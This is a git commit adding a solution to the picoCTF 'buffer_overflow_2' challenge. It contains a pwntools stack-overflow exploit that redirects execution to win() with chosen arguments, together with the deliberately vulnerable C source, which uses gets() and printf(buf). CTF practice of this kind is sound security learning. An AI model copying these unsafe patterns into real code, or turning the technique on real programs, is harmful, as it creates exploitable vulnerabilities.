pwn/buffer_overflow_2
This commit is contained in:
parent
2e33defa56
commit
c56300256d
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -p python3 -i python3 python3Packages.pwntools
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
|
||||
|
||||
def conn():
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
|
||||
print(r.recvuntil(b"Please enter your string:"))
|
||||
offset = 112 # found with pwndbg
|
||||
payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
|
||||
r.sendline(payload)
|
||||
print(r.recvall())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
Binary file not shown.
|
@ -0,0 +1,43 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
#define BUFSIZE 100
|
||||
#define FLAGSIZE 64
|
||||
|
||||
void win(unsigned int arg1, unsigned int arg2) {
|
||||
char buf[FLAGSIZE];
|
||||
FILE *f = fopen("flag.txt","r");
|
||||
if (f == NULL) {
|
||||
printf("%s %s", "Please create 'flag.txt' in this directory with your",
|
||||
"own debugging flag.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fgets(buf,FLAGSIZE,f);
|
||||
if (arg1 != 0xCAFEF00D)
|
||||
return;
|
||||
if (arg2 != 0xF00DF00D)
|
||||
return;
|
||||
printf(buf);
|
||||
}
|
||||
|
||||
void vuln(){
|
||||
char buf[BUFSIZE];
|
||||
gets(buf);
|
||||
puts(buf);
|
||||
}
|
||||
|
||||
int main(int argc, char **argv){
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
|
||||
gid_t gid = getegid();
|
||||
setresgid(gid, gid, gid);
|
||||
|
||||
puts("Please enter your string: ");
|
||||
vuln();
|
||||
return 0;
|
||||
}
|
||||
|
Loading…
Reference in New Issue